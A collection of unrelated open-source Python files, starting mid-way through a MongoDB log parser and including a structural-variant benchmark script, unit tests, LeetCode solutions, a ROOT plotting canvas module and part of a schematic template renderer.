result['orderby'] = parsed['sort']
toMask['$orderby'] = parsed['sort']
toMask['$query'] = query
elif command.lower() == 'geonear':
result['ns'] = match.group('db') + '.'
result['ns'] += parsed[command]
query = self.standardize_query(parsed['search'])
result['query'] = query
toMask = query
else:
result['supported'] = False
result['ns'] = match.group('db') + '.$cmd'
result['command'] = command
toMask['$cmd'] = command
result['queryMask'] = small_json(toMask)
return result
return None
############################################################################
# UpdateQueryHandler
# QueryLineHandler implementation for update queries
############################################################################
class UpdateQueryHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'Update Log Line Handler'
self._regex = '.*\[conn(?P<connection_id>\d+)\] '
self._regex += 'update (?P<ns>\S+\.\S+) query: '
self._regex += '(?P<query>\{.*\}) update: (?P<update>\{.*\}) '
self._regex += '(?P<stats>(\S+ )*)(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
parsed = self.parse_query(match.group('query'))
if parsed is not None:
result = OrderedDict()
scrubbed = self.standardize_query(parsed)
result['query'] = scrubbed['$query']
if '$orderby' in scrubbed:
result['orderby'] = scrubbed['$orderby']
result['queryMask'] = small_json(scrubbed)
result['ns'] = match.group('ns')
result['stats'] = self.parse_line_stats(match.group('stats'))
result['stats']['millis'] = match.group('query_time')
result['supported'] = True
return result
return None
############################################################################
# Empty TimeLineHandler class
# Last Resort for unparsed lines
############################################################################
class TimeLineHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'Standard Query Log Line Handler'
self._regex = '.*(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
return {'ns': "?",
'stats': {"millis": match.group('query_time')},
'supported': False,
'queryMask': None
}
return None
|
src/benchmarks/cmp_NA19240.py | npinter/cuteSV | 116 | 11096887 | <filename>src/benchmarks/cmp_NA19240.py
import sys
import argparse
import logging
import time
callset = {1: "cuteSV", 2: "Sniflles", 3: "PBSV", 4: "SVIM"}
USAGE="""\
Evaluate SV callset on NA19240 dataset
"""
def parseArgs(argv):
parser = argparse.ArgumentParser(prog="NA19240_eval", description=USAGE, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("base", type=str, help="Base vcf file of NA19240.")
parser.add_argument("cuteSV", type=str, help="CuteSV vcf file of NA19240.")
parser.add_argument("sniffles", type=str, help="Sniffles vcf file of NA19240.")
parser.add_argument("pbsv", type=str, help="PBSV vcf file of NA19240.")
parser.add_argument("svim", type=str, help="SVIM vcf file of NA19240.")
parser.add_argument('-b', '--bias', help = "Bias of overlaping.[%(default)s]", default = 0.7, type = float)
parser.add_argument('-o', '--offect', help = "Offect of breakpoint distance.[%(default)s]", default = 1000, type = int)
args = parser.parse_args(argv)
return args
def pase_base_info(seq):
info = {'SVLEN': 0, 'END': 0, "SVTYPE": '', "RE": 0}
for i in seq.split(';'):
if i.split('=')[0] in ["SVLEN", "END", "RE"]:
try:
info[i.split('=')[0]] = abs(int(i.split('=')[1]))
except:
pass
if i.split('=')[0] == "SVTYPE":
info[i.split('=')[0]] = i.split('=')[1][0:3]
return info
def load_base(base_path):
base_call = dict()
file = open(base_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
ALT = seq[4][1:4]
if ALT not in ["INS", "INV", "DEL", "DUP"]:
continue
if ALT == "DUP":
ALT = "INS"
info = pase_base_info(seq[7])
if ALT not in base_call:
base_call[ALT] = dict()
if chr not in base_call[ALT]:
base_call[ALT][chr] = list()
if ALT == "INV":
base_call[ALT][chr].append([pos, info["END"] - pos + 1, info["END"], 0])
else:
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
base_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0])
file.close()
return base_call
def load_cuteSV(cuteSV_path):
# inv_tag = 0
last_inv = list()
cuteSV_call = dict()
file = open(cuteSV_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
ALT = seq[2][7:10]
# if ALT == "DUP":
# ALT = "INS"
if ALT not in ["INS", "INV", "DEL", "DUP"]:
continue
info = pase_base_info(seq[7])
if ALT not in cuteSV_call:
cuteSV_call[ALT] = dict()
if chr not in cuteSV_call[ALT]:
cuteSV_call[ALT][chr] = list()
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
if ALT == "INV":
last_inv.append([ALT, chr, pos, info["SVLEN"], info["END"], info["RE"]])
# if inv_tag == 0
else:
cuteSV_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0])
# inv_tag = 0
if len(last_inv):
last_inv = sorted(last_inv, key = lambda x:-x[3])
cuteSV_call[last_inv[0][0]][last_inv[0][1]].append([last_inv[0][2], last_inv[0][3], last_inv[0][4], 0])
last_inv = list()
file.close()
return cuteSV_call
def load_sniffles(sniffles_path):
sniffles_call = dict()
last_inv = list()
file = open(sniffles_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
info = pase_base_info(seq[7])
if info["SVTYPE"] not in ["INS", "INV", "DEL", "DUP"]:
continue
# if info["SVTYPE"] == "DUP":
# info["SVTYPE"] = "INS"
if info["SVTYPE"] not in sniffles_call:
sniffles_call[info["SVTYPE"]] = dict()
if chr not in sniffles_call[info["SVTYPE"]]:
sniffles_call[info["SVTYPE"]][chr] = list()
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
if info["SVTYPE"] == "INV":
last_inv.append([info["SVTYPE"], chr, pos, info["SVLEN"], info["END"], info["RE"]])
else:
sniffles_call[info["SVTYPE"]][chr].append([pos, info["SVLEN"], info["END"], 0])
if len(last_inv):
last_inv = sorted(last_inv, key = lambda x:-x[3])
sniffles_call[last_inv[0][0]][last_inv[0][1]].append([last_inv[0][2], last_inv[0][3], last_inv[0][4], 0])
last_inv = list()
file.close()
return sniffles_call
def load_pbsv(pbsv_path):
pbsv_call = dict()
file = open(pbsv_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
info = pase_base_info(seq[7])
if info["SVTYPE"] not in ["INS", "INV", "DEL", "DUP"]:
continue
# if info["SVTYPE"] == "DUP":
# info["SVTYPE"] = "INS"
if info["SVTYPE"] not in pbsv_call:
pbsv_call[info["SVTYPE"]] = dict()
if chr not in pbsv_call[info["SVTYPE"]]:
pbsv_call[info["SVTYPE"]][chr] = list()
if info["SVTYPE"] == "INV":
pbsv_call[info["SVTYPE"]][chr].append([pos, info["END"] - pos + 1, info["END"], 0])
else:
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
pbsv_call[info["SVTYPE"]][chr].append([pos, info["SVLEN"], info["END"], 0])
file.close()
return pbsv_call
def load_svim(base_path):
base_call = dict()
file = open(base_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
ALT = seq[4][1:4]
if ALT not in ["INS", "INV", "DEL", "DUP"]:
continue
# if ALT == "DUP":
# ALT = "INS"
info = pase_base_info(seq[7])
if ALT not in base_call:
base_call[ALT] = dict()
if chr not in base_call[ALT]:
base_call[ALT][chr] = list()
if ALT == "INV":
base_call[ALT][chr].append([pos, info["END"] - pos + 1, info["END"], 0])
else:
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
base_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0])
file.close()
return base_call
def cmp_callsets(base, call, flag, Bias, Offect):
for svtype in base:
if svtype not in call:
continue
else:
for chr in base[svtype]:
if chr not in call[svtype]:
continue
else:
for i in base[svtype][chr]:
for j in call[svtype][chr]:
if i[0] - Offect <= j[0] <= i[2] + Offect or i[0] - Offect <= j[2] <= i[2] + Offect or j[0] - Offect <= i[0] <= j[2] + Offect:
if min(i[1], j[1])*1.0/max(i[1], j[1]) >= Bias:
i[3] = flag
j[3] = flag
else:
pass
total_base = 0
tp_base = 0
# for svtype in ["INS"]:
# for svtype in ["DUP"]:
# for svtype in ["DEL"]:
# for svtype in ["INS", "DEL"]:
for svtype in ["INS", "DEL", "INV"]:
# for svtype in ["INS", "DEL", "INV", "DUP"]:
# for svtype in ["INV"]:
for chr in base[svtype]:
for i in base[svtype][chr]:
total_base += 1
if i[3] == flag:
tp_base += 1
# else:
# print(flag, svtype, chr, i[0], i[1], i[2])
# logging.info("Base count: %d"%(total_base))
# logging.info("TP-base count: %d"%(tp_base))
logging.info("====%s===="%(callset[flag]))
total_call = 0
tp_call = 0
# for svtype in ["INS"]:
# for svtype in ["DUP"]:
# for svtype in ["DEL"]:
# for svtype in ["INS", "DEL"]:
for svtype in ["INS", "DEL", "INV"]:
# for svtype in ["INS", "DEL", "INV", "DUP"]:
# for svtype in ["INV"]:
for chr in call[svtype]:
for i in call[svtype][chr]:
total_call += 1
if i[3] == flag:
tp_call += 1
logging.info("Camp count: %d"%(total_call))
logging.info("TP-call count: %d"%(tp_call))
logging.info("Precision: %.2f"%(100.0*tp_call/total_call))
logging.info("Recall: %.2f"%(100.0*tp_base/total_base))
logging.info("F-measure: %.2f"%(200.0*tp_base*tp_call/(total_base*tp_call+tp_base*total_call)))
def main_ctrl(args):
# pass
base_call = load_base(args.base)
cuteSV_call = load_cuteSV(args.cuteSV)
sniffles_call = load_sniffles(args.sniffles)
pbsv_call = load_pbsv(args.pbsv)
svim_call = load_svim(args.svim)
# for svtype in sniffles_call:
# for chr in sniffles_call[svtype]:
# for i in sniffles_call[svtype][chr]:
# print(svtype, chr, i)
cmp_callsets(base_call, cuteSV_call, 1, args.bias, args.offect)
cmp_callsets(base_call, sniffles_call, 2, args.bias, args.offect)
cmp_callsets(base_call, pbsv_call, 3, args.bias, args.offect)
cmp_callsets(base_call, svim_call, 4, args.bias, args.offect)
def main(argv):
args = parseArgs(argv)
setupLogging(False)
# print args
starttime = time.time()
main_ctrl(args)
logging.info("Finished in %0.2f seconds."%(time.time() - starttime))
def setupLogging(debug=False):
logLevel = logging.DEBUG if debug else logging.INFO
logFormat = "%(asctime)s [%(levelname)s] %(message)s"
logging.basicConfig( stream=sys.stderr, level=logLevel, format=logFormat )
logging.info("Running %s" % " ".join(sys.argv))
if __name__ == '__main__':
main(sys.argv[1:])
|
mindinsight/lineagemgr/common/utils.py | fapbatista/mindinsight | 216 | 11096895 | <filename>mindinsight/lineagemgr/common/utils.py
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Lineage utils."""
import re
from mindinsight.datavisual.data_transform.summary_watcher import SummaryWatcher
def enum_to_list(enum):
"""Enum to list."""
return [enum_ele.value for enum_ele in enum]
def get_timestamp(filename):
"""Get timestamp from filename."""
timestamp = int(re.search(SummaryWatcher().SUMMARY_FILENAME_REGEX, filename)[1])
return timestamp
|
stix_shifter_modules/msatp/tests/stix_translation/test_query_constructor_func.py | pyromaneact/stix-shifter | 129 | 11096953 | from stix_shifter_modules.msatp.stix_translation import query_constructor
from stix_shifter_modules.msatp.stix_translation.query_constructor import QueryStringPatternTranslator
import unittest
class MergeDictTests(unittest.TestCase):
def test_with_overlapping_keys(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
dict_02 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
expected_res = {1: ['a', 'a'], 2: ['b', 'b'], 3: ['c', 'c'], 4: ['d', 'd']}
self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), expected_res, "incorrect result")
def test_without_overlapping_keys(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
dict_02 = {5: 'e', 6: 'f', 7: 'g', 8: 'h'}
expected_res = {1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e', 6: 'f', 7: 'g', 8: 'h'}
self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), expected_res, "incorrect result")
def test_with_empty_map(self):
dict_01 = {1: 'a', 2: 'b'}
dict_02 = {}
self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), dict_01, "incorrect result")
class ConstructIntersecMap(unittest.TestCase):
def test_non_empty_intersection(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c'}
dict_02 = {1: 'a', 2: 'b', 4: 'd'}
expected_res = {1: ['a', 'a'], 2: ['b', 'b']}
self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), expected_res,
"incorrect result")
def test_empty_intersection(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c'}
dict_02 = {4: 'd', 5: 'e', 6: 'f'}
self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), {},
"incorrect result")
def test_with_empty_map(self):
dict_01 = {1: 'a', 2: 'b'}
dict_02 = {}
self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), dict_02, "incorrect result")
def test_construct_and_op_map(self):
test_mep_01 = {"DeviceNetworkEvents": 'DeviceName =~ "2.client-channel.google.com"',
"DeviceProcessEvents": 'InitiatingProcessFileName =~ "WmiPrvSE.exe"'}
test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'}
expected_res = {"DeviceNetworkEvents": '(InitiatingProcessFileName =~ "demo-gthread-3.6.dll") and (DeviceName '
'=~ "2.client-channel.google.com")'}
self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), expected_res, "incorrect result")
def test_construct_and_op_map_with_empty_map(self):
test_mep_01 = {}
test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'}
self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), {}, "incorrect result")
def test_construct_and_op_map_with_empty_intersec(self):
test_mep_01 = {"DeviceProcessEvents": 'InitiatingProcessFileName =~ "WmiPrvSE.exe"'}
test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'}
self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), {}, "incorrect result")
|
tests/apps/core/test_templates_richie_homepage.py | regisb/richie | 174 | 11096960 | """
Test suite for the Open Graph of the homepage
"""
import re
from django.test.utils import override_settings
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.helpers import create_i18n_page
class TemplatesRichieHomepageTestCase(CMSTestCase):
"""Testing the base.html template"""
def test_templates_richie_homepage_meta_og_image(self):
"""
Test if the homepage has the default og:image logo
"""
homepage = create_i18n_page("my title", is_homepage=True)
homepage.publish("en")
url = homepage.get_absolute_url(language="en")
response = self.client.get(url)
response_content = response.content.decode("UTF-8")
match = re.search("<meta[^>]+og:image[^>]+(/)?>", response_content)
html_meta_og_image = match.group(0)
self.assertIn(
'content="http://testserver/static/richie/images/logo.png',
html_meta_og_image,
)
self.assertIn("richie/images/logo.png", html_meta_og_image)
@override_settings(STATIC_URL="https://xyz.cloudfront.net/static/")
def test_templates_richie_homepage_meta_og_image_with_cdn(self):
"""
Test if the homepage has the default og:image logo when using a CDN
"""
homepage = create_i18n_page("my title", is_homepage=True)
homepage.publish("en")
url = homepage.get_absolute_url(language="en")
response = self.client.get(url)
response_content = response.content.decode("UTF-8")
match = re.search("<meta[^>]+og:image[^>]+(/)?>", response_content)
html_meta_og_image = match.group(0)
self.assertIn(
'content="https://xyz.cloudfront.net/static/richie/images/logo.png',
html_meta_og_image,
)
self.assertIn("richie/images/logo.png", html_meta_og_image)
|
String/809. Expressive Words.py | beckswu/Leetcode | 138 | 11096984 | <filename>String/809. Expressive Words.py
"""
809. Expressive Words
Example:
Input:
S = "heeellooo"
words = ["hello", "hi", "helo"]
Output: 1
Explanation:
We can extend "e" and "o" in the word "hello" to get "heeellooo".
We can't extend "helo" to get "heeellooo" because the group "ll" is not extended.
"""
class Solution:
def expressiveWords(self, S, words):
"""
:type S: str
:type words: List[str]
:rtype: int
"""
res = 0
for word in words:
i = j = 0
while i<len(S):
if j<len(word) and S[i] == word[j]:
i+=1
j+=1
elif i+1<len(S) and S[i+1] == S[i] and i>0 and S[i] == S[i-1]:
i+=1
elif not (i>1 and S[i] == S[i-1] == S[i-2]):
break
else:
i+=1
if i == len(S) and j == len(word):
res += 1
return res
class Solution:
def expressiveWords(self, S, words):
def is_stretched(S, W):
i, j, n, m = 0, 0, len(S), len(W)
for i in range(n):
if j < m and S[i] == W[j]:
j += 1
elif S[i-1:i+2] != S[i]*3 != S[i-2:i+1]:
return False
return j == m
return sum(is_stretched(S, w) for w in words)
import itertools
class Solution(object):
def expressiveWords(self, S, words):
"""
:type S: str
:type words: List[str]
:rtype: int
"""
# Run length encoding
def RLE(S):
return zip(*[(k, len(list(grp)))
for k, grp in itertools.groupby(S)])
R, count = RLE(S)
result = 0
for word in words:
R2, count2 = RLE(word)
if R2 != R:
continue
result += all(c1 >= max(c2, 3) or c1 == c2
for c1, c2 in zip(count, count2))
return result |
src/main.py | alpayuz/DeepDeblur-PyTorch | 158 | 11097015 | <reponame>alpayuz/DeepDeblur-PyTorch
"""main file that does everything"""
from utils import interact
from option import args, setup, cleanup
from data import Data
from model import Model
from loss import Loss
from optim import Optimizer
from train import Trainer
def main_worker(rank, args):
args.rank = rank
args = setup(args)
loaders = Data(args).get_loader()
model = Model(args)
model.parallelize()
optimizer = Optimizer(args, model)
criterion = Loss(args, model=model, optimizer=optimizer)
trainer = Trainer(args, model, criterion, optimizer, loaders)
if args.stay:
interact(local=locals())
exit()
if args.demo:
trainer.evaluate(epoch=args.start_epoch, mode='demo')
exit()
for epoch in range(1, args.start_epoch):
if args.do_validate:
if epoch % args.validate_every == 0:
trainer.fill_evaluation(epoch, 'val')
if args.do_test:
if epoch % args.test_every == 0:
trainer.fill_evaluation(epoch, 'test')
for epoch in range(args.start_epoch, args.end_epoch+1):
if args.do_train:
trainer.train(epoch)
if args.do_validate:
if epoch % args.validate_every == 0:
if trainer.epoch != epoch:
trainer.load(epoch)
trainer.validate(epoch)
if args.do_test:
if epoch % args.test_every == 0:
if trainer.epoch != epoch:
trainer.load(epoch)
trainer.test(epoch)
if args.rank == 0 or not args.launched:
print('')
trainer.imsaver.join_background()
cleanup(args)
def main():
main_worker(args.rank, args)
if __name__ == "__main__":
main() |
python/ql/test/3/library-tests/modules/general/confused_elements/__init__.py | vadi2/codeql | 4,036 | 11097027 | from .a import b as a |
rootpy/plotting/canvas.py | masonproffitt/rootpy | 146 | 11097036 | """
This module implements python classes which inherit from
and extend the functionality of the ROOT canvas classes.
"""
from __future__ import absolute_import
from .. import ROOT, QROOT, asrootpy
from .base import convert_color
from ..base import NamedObject
from ..context import invisible_canvas
from ..decorators import snake_case_methods
from ..memory.keepalive import keepalive
from array import array
__all__ = [
'Pad',
'Canvas',
]
class _PadBase(NamedObject):
# https://sft.its.cern.ch/jira/browse/ROOT-9007
# can remove this after 6.10/04
EmitVA = None
def cd(self, *args):
pad = asrootpy(super(_PadBase, self).cd(*args))
if pad and pad is not self:
keepalive(self, pad)
return pad
def axes(self, ndim=1,
xlimits=None, ylimits=None, zlimits=None,
xbins=1, ybins=1, zbins=1):
"""
Create and return axes on this pad
"""
if xlimits is None:
xlimits = (0, 1)
if ylimits is None:
ylimits = (0, 1)
if zlimits is None:
zlimits = (0, 1)
if ndim == 1:
from .hist import Hist
hist = Hist(1, xlimits[0], xlimits[1])
elif ndim == 2:
from .hist import Hist2D
hist = Hist2D(1, xlimits[0], xlimits[1],
1, ylimits[0], ylimits[1])
elif ndim == 3:
from .hist import Hist3D
hist = Hist3D(1, xlimits[0], xlimits[1],
1, ylimits[0], ylimits[1],
1, zlimits[0], zlimits[1])
else:
raise ValueError("ndim must be 1, 2, or 3")
with self:
hist.Draw('AXIS')
xaxis = hist.xaxis
yaxis = hist.yaxis
if isinstance(xbins, (list, tuple)):
xbins = array('d', xbins)
if hasattr(xbins, '__iter__'):
xaxis.Set(len(xbins) - 1, xbins)
else:
xaxis.Set(xbins, *xlimits)
if ndim > 1:
if isinstance(ybins, (list, tuple)):
ybins = array('d', ybins)
if hasattr(ybins, '__iter__'):
yaxis.Set(len(ybins) - 1, ybins)
else:
yaxis.Set(ybins, *ylimits)
else:
yaxis.limits = ylimits
yaxis.range_user = ylimits
if ndim > 1:
zaxis = hist.zaxis
if ndim == 3:
if isinstance(zbins, (list, tuple)):
zbins = array('d', zbins)
if hasattr(zbins, '__iter__'):
zaxis.Set(len(zbins) - 1, zbins)
else:
zaxis.Set(zbins, *zlimits)
else:
zaxis.limits = zlimits
zaxis.range_user = zlimits
return xaxis, yaxis, zaxis
return xaxis, yaxis
@property
def primitives(self):
return asrootpy(self.GetListOfPrimitives())
def find_all_primitives(self):
"""
Recursively find all primities on a pad, even those hiding behind a
GetListOfFunctions() of a primitive
"""
# delayed import to avoid circular import
from .utils import find_all_primitives
return find_all_primitives(self)
@property
def canvas(self):
return asrootpy(self.GetCanvas())
@property
def mother(self):
return asrootpy(self.GetMother())
@property
def margin(self):
return (self.GetLeftMargin(), self.GetRightMargin(),
self.GetBottomMargin(), self.GetTopMargin())
@margin.setter
def margin(self, bounds):
left, right, bottom, top = bounds
super(_PadBase, self).SetMargin(left, right, bottom, top)
@property
def margin_pixels(self):
left, right, bottom, top = self.margin
width = self.width_pixels
height = self.height_pixels
return (int(left * width), int(right * width),
int(bottom * height), int(top * height))
@margin_pixels.setter
def margin_pixels(self, bounds):
left, right, bottom, top = bounds
width = float(self.width_pixels)
height = float(self.height_pixels)
super(_PadBase, self).SetMargin(left / width, right / width,
bottom / height, top / height)
@property
def range(self):
x1, y1 = ROOT.Double(), ROOT.Double()
x2, y2 = ROOT.Double(), ROOT.Double()
super(_PadBase, self).GetRange(x1, y1, x2, y2)
return x1, y1, x2, y2
@range.setter
def range(self, bounds):
x1, y1, x2, y2 = bounds
super(_PadBase, self).Range(x1, y1, x2, y2)
@property
def range_axis(self):
x1, y1 = ROOT.Double(), ROOT.Double()
x2, y2 = ROOT.Double(), ROOT.Double()
super(_PadBase, self).GetRangeAxis(x1, y1, x2, y2)
return x1, y1, x2, y2
@range_axis.setter
def range_axis(self, bounds):
x1, y1, x2, y2 = bounds
super(_PadBase, self).RangeAxis(x1, y1, x2, y2)
def __enter__(self):
self._prev_pad = ROOT.gPad
self.cd()
return self
def __exit__(self, type, value, traceback):
# similar to preserve_current_canvas in rootpy/context.py
if self._prev_pad:
self._prev_pad.cd()
elif ROOT.gPad:
# Put things back how they were before.
with invisible_canvas():
# This is a round-about way of resetting gPad to None.
# No other technique I tried could do it.
pass
self._prev_pad = None
return False
@snake_case_methods
class Pad(_PadBase, QROOT.TPad):
_ROOT = QROOT.TPad
def __init__(self, xlow, ylow, xup, yup,
color=-1,
bordersize=-1,
bordermode=-2,
name=None,
title=None):
color = convert_color(color, 'root')
super(Pad, self).__init__(xlow, ylow, xup, yup,
color, bordersize, bordermode,
name=name,
title=title)
def Draw(self, *args):
ret = super(Pad, self).Draw(*args)
canvas = self.GetCanvas()
keepalive(canvas, self)
return ret
@property
def width(self):
return self.GetWNDC()
@property
def height(self):
return self.GetHNDC()
@property
def width_pixels(self):
mother = self.mother
canvas = self.canvas
w = self.GetWNDC()
while mother is not canvas:
w *= mother.GetWNDC()
mother = mother.mother
return int(w * mother.width)
@property
def height_pixels(self):
mother = self.mother
canvas = self.canvas
h = self.GetHNDC()
while mother is not canvas:
h *= mother.GetHNDC()
mother = mother.mother
return int(h * mother.height)
@snake_case_methods
class Canvas(_PadBase, QROOT.TCanvas):
_ROOT = QROOT.TCanvas
def __init__(self,
width=None, height=None,
x=None, y=None,
name=None, title=None,
size_includes_decorations=False):
# The following line will trigger finalSetup and start the graphics
# thread if not started already
style = ROOT.gStyle
if width is None:
width = style.GetCanvasDefW()
if height is None:
height = style.GetCanvasDefH()
if x is None:
x = style.GetCanvasDefX()
if y is None:
y = style.GetCanvasDefY()
super(Canvas, self).__init__(x, y, width, height,
name=name, title=title)
if not size_includes_decorations:
# Canvas dimensions include the window manager's decorations by
# default in vanilla ROOT. I think this is a bad default.
# Since in the most common case I don't care about the window
# decorations, the default will be to set the dimensions of the
# paintable area of the canvas.
if self.IsBatch():
self.SetCanvasSize(width, height)
else:
self.SetWindowSize(width + (width - self.GetWw()),
height + (height - self.GetWh()))
self.size_includes_decorations = size_includes_decorations
@property
def width(self):
return self.GetWw()
@width.setter
def width(self, value):
value = int(value)
if self.IsBatch():
self.SetCanvasSize(value, self.GetWh())
else:
curr_height = self.GetWh()
self.SetWindowSize(value, curr_height)
if not getattr(self, 'size_includes_decorations', False):
self.SetWindowSize(value + (value - self.GetWw()),
curr_height + (curr_height - self.GetWh()))
@property
def width_pixels(self):
return self.GetWw()
@width_pixels.setter
def width_pixels(self, value):
self.width = value
@property
def height(self):
return self.GetWh()
@height.setter
def height(self, value):
value = int(value)
if self.IsBatch():
self.SetCanvasSize(self.GetWw(), value)
else:
curr_width = self.GetWw()
self.SetWindowSize(curr_width, value)
if not getattr(self, 'size_includes_decorations', False):
self.SetWindowSize(curr_width + (curr_width - self.GetWw()),
value + (value - self.GetWh()))
@property
def height_pixels(self):
return self.GetWh()
@height_pixels.setter
def height_pixels(self, value):
self.height = value
|
flaskerize/render.py | ehoeffner/flaskerize | 119 | 11097038 | <gh_stars>100-1000
import os
import argparse
from typing import Any, Callable, Dict, List, Optional
import fs
from termcolor import colored
from flaskerize.parser import FzArgumentParser
DEFAULT_TEMPLATE_PATTERN = ["**/*.template"]
class SchematicRenderer:
"""Render Flaskerize schematics"""
# Path to schematic files to copy, relative to top-level schematic_path
DEFAULT_FILES_DIRNAME = "files"
def __init__(
self,
schematic_path: str,
src_path: str = ".",
output_prefix: str = "",
dry_run: bool = False,
):
from jinja2 import Environment
from flaskerize.fileio import StagedFileSystem
self.src_path = src_path
self.output_prefix = output_prefix
self.schematic_path = schematic_path
self.schematic_files_path = os.path.join(
self.schematic_path, self.DEFAULT_FILES_DIRNAME
)
self.schema_path = self._get_schema_path()
self._load_schema()
self.arg_parser = self._check_get_arg_parser()
self.env = Environment()
self.fs = StagedFileSystem(
src_path=self.src_path, output_prefix=output_prefix, dry_run=dry_run
)
self.sch_fs = fs.open_fs(f"osfs://{self.schematic_files_path}")
self.dry_run = dry_run
def _load_schema(self) -> None:
if self.schema_path:
import json
with open(self.schema_path, "r") as fid:
self.config = json.load(fid)
else:
self.config = {}
def _get_schema_path(self) -> Optional[str]:
schema_path = os.path.join(self.schematic_path, "schema.json")
if not os.path.isfile(schema_path):
return None
return schema_path
def _check_get_arg_parser(
self, schema_path: Optional[str] = None
) -> FzArgumentParser:
"""Load argument parser from schema.json, if provided"""
return FzArgumentParser(schema=schema_path or self.schema_path)
def copy_from_sch(self, src_path: str, dst_path: str = None) -> None:
"""Copy a file from the schematic root to to the staging file system"""
dst_path = dst_path or src_path
dst_dir = os.path.dirname(dst_path)
if not self.fs.render_fs.exists(dst_dir):
self.fs.render_fs.makedirs(dst_dir)
return fs.copy.copy_file(
self.sch_fs, src_path, self.fs.render_fs, dst_path or src_path
)
def get_static_files(self) -> List[str]:
"""Get list of files to be copied unchanged"""
from pathlib import Path
patterns = self.config.get("templateFilePatterns", DEFAULT_TEMPLATE_PATTERN)
all_files = list(str(p) for p in Path(self.schematic_files_path).glob("**/*"))
filenames = [os.path.relpath(s, self.schematic_files_path) for s in all_files]
filenames = list(set(filenames) - set(self.get_template_files()))
return filenames
def get_template_files(self) -> List[str]:
"""Get list of templated files to be rendered via Jinja"""
from pathlib import Path
filenames = []
patterns = self.config.get("templateFilePatterns", DEFAULT_TEMPLATE_PATTERN)
for pattern in patterns:
filenames.extend(
[str(p) for p in Path(self.schematic_files_path).glob(pattern)]
)
ignore_filenames = self._get_ignore_files()
filenames = list(set(filenames) - set(ignore_filenames))
filenames = [os.path.relpath(s, self.schematic_files_path) for s in filenames]
return filenames
def _get_ignore_files(self) -> List[str]:
from pathlib import Path
ignore_filenames = []
ignore_patterns = self.config.get("ignoreFilePatterns", [])
for pattern in ignore_patterns:
ignore_filenames.extend(
[str(p) for p in Path(self.schematic_path).glob(pattern)]
)
return ignore_filenames
def _generate_outfile(
self, template_file: str, root: str, context: Optional[Dict] = None
) -> str:
# TODO: remove the redundant parameter template file that is copied
# outfile_name = self._get_rel_path(full_path=template_file, rel_to=root)
outfile_name = "".join(template_file.rsplit(".template"))
tpl = self.env.from_string(outfile_name)
if context is None:
context = {}
return tpl.render(**context)
def render_from_file(self, template_path: str, context: Dict) -> None:
outpath = self._generate_outfile(template_path, self.src_path, context=context)
outdir, outfile = os.path.split(outpath)
rendered_outpath = os.path.join(self.src_path, outpath)
rendered_outdir = os.path.join(rendered_outpath, outdir)
if self.sch_fs.isfile(template_path):
# TODO: Refactor dry-run and file system interactions to a composable object
# passed into this class rather than it containing the write logic
# with open(template_path, "r") as fid:
with self.sch_fs.open(template_path, "r") as fid:
tpl = self.env.from_string(fid.read())
with self.fs.open(outpath, "w") as fout:
fout.write(tpl.render(**context))
def copy_static_file(self, filename: str, context: Dict[str, Any]):
from shutil import copy
# If the path is a directory, need to ensure trailing slash so it does not get
# split incorrectly
if self.sch_fs.isdir(filename):
filename = os.path.join(filename, "")
